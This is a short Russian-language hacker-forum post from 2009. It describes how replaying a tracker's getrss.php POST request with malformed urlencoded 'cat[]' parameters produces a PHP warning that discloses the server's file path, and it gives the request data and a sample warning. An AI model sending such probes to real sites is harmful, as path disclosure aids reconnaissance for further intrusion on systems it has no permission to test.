28.09.2009, 13:36
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
И еще,незнаю будет ли работать гдето еще,ибо нет желания тестировать,но трекеры в моей локальной сети точно подвержены:
PHP код:
http://good73.net/getrss.php
При нажатии сабмита имеем POST данные:
PHP код:
cat%5B%5D=22&cat%5B%5D=20&cat%5B%5D=12&feed=web&login=passkey
Так вот,если просто повторить запрос,использовав при этом urlencode()(как в примере),получим раскрытие путей:
PHP код:
Warning: implode() [function.implode]: Invalid arguments passed in /usr/local/www/target.com/getrss.php on line 56
|
|
|